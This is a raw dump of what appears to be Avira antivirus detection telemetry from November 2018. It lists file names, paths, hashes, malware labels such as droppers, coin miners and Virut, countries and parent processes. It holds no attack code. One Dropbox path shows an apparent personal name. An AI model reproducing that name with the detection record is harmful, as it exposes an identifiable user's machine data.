  Row(detection=Row(filename='5bdbede0a0bbc7d09dd0d228d82b3148fe9c74128c678e5379280c842c2d9280.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.available\\Avira\\5BDBEDE0A0BBC7D09DD0D228D82B3148FE9C74128C678E5379280C842C2D9280.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5bdbede0a0bbc7d09dd0d228d82b3148fe9c74128c678e5379280c842c2d9280', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:54:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0bb1c7bdd19aec67347e68ecdca510472e8eb621ca77116220fcc9cbd7bc7eb4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BB1C7BDD19AEC67347E68ECDCA510472E8EB621CA77116220FCC9CBD7BC7EB4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0bb1c7bdd19aec67347e68ecdca510472e8eb621ca77116220fcc9cbd7bc7eb4', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:17:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (3).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (3).exe', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:49:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\DOWNLOADS\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T19:38:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105445-40160a14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-105445-40160A14', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:54:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-112654-43d2fe44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-112552-3E02B11E\\AVSCAN-20181102-112654-43D2FE44', filesize=1088000, name='EXP/Excel.Exploit.Gen.#M1.#R1'), hash='46fca5e52395ecf0f3467a783e0bffb96a30de97377a885a87b67b367c7c014a', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:27:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:31:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='15a1db84497009e12fdb7552f2760ba209e56d386593b9217f9f6310466a8a84', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T13:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-115513-85681f4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6a01c15\\AVSCAN-20181102-115455-82820F5C\\AVSCAN-20181102-115513-85681F4A', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:55:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T09:57:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184556-0a7cf398', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-184556-0A7CF398', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:45:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T20:13:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-112550-c204ddca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a43139b9\\AVSCAN-20181102-112514-BFB93415\\AVSCAN-20181102-112550-C204DDCA', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:25:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:18:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0123812.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0123812.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f1387646624.dll', filepath='D:\\retry\\recup_dir.1992\\f1387646624.dll', filesize=128000, name='TR/Crypt.XPACK.Gen3.#M300.#R200144'), hash='18ba5f765bfda3b8f3e3a5eb112d852d8659de619c43ad87359627b41e79f50a', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T14:00:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113744-07e069f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b3776509\\AVSCAN-20181102-113732-05850B86\\AVSCAN-20181102-113744-07E069F6', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:43:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unblockpin.exe', filepath='C:\\Program Files\\D-com 3G\\UnblockPin.exe', filesize=41472000, name='W32/Sality.AT.#M1.#R1'), hash='14e3bc696c7c4e79bc4cd2bf41f9ab2e0e4c3cd9747c603b5ec045ecd9a6bfba', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Office\\Office12\\GrooveMonitor.exe', parentsize=100648, timestamp='2018-11-02T15:42:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160949-59b756a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-160949-59B756A2', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:12:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052223-3f89c388', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052223-3F89C388', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144807-cae56d34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-144807-CAE56D34', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061259-511319ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061259-511319FF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143410-2f59169e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-143410-2F59169E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050707-1def0e27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050707-1DEF0E27', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061351-706a651a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061351-706A651A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053145-8e858237', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053145-8E858237', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104831-5b97324c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-104746-534354B7\\AVSCAN-20181102-104831-5B97324C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:51:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125643-f0eaee21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-125643-F0EAEE21', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:59:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174403-700a6e16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b75b2a24\\AVSCAN-20181102-171048-3B26D367\\AVSCAN-20181102-174403-700A6E16', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:44:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='models.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL14\\MODELS\\MODELS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='56e922b92bf1d7ecb8c13fe8607b4d485a5d25da3ec8d1fa7198c8429c4cbfda', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4ccaa4375c978fa1f8bc6a651205398ca0801c04fcb88498e0e05ef149807010', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4CCAA4375C978FA1F8BC6A651205398CA0801C04FCB88498E0E05EF149807010', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4ccaa4375c978fa1f8bc6a651205398ca0801c04fcb88498e0e05ef149807010', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:21:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lrkbulny.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\lRkbUlny.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123614-f40c7abd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_80e9aa98\\AVSCAN-20181102-123559-F2831CF6\\AVSCAN-20181102-123614-F40C7ABD', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052215-3af54181', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052215-3AF54181', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141338-4a52918a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-141338-4A52918A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055253-828f4a71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055253-828F4A71', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105339-4b3a24e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105339-4B3A24E3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dgprwmzp.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\dGpRWmZp.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-142249-b0bc3aba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-142249-B0BC3ABA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052436-8f3c54e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052436-8F3C54E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:35Z'), dt=datetime.date(2018, 11, 2)),
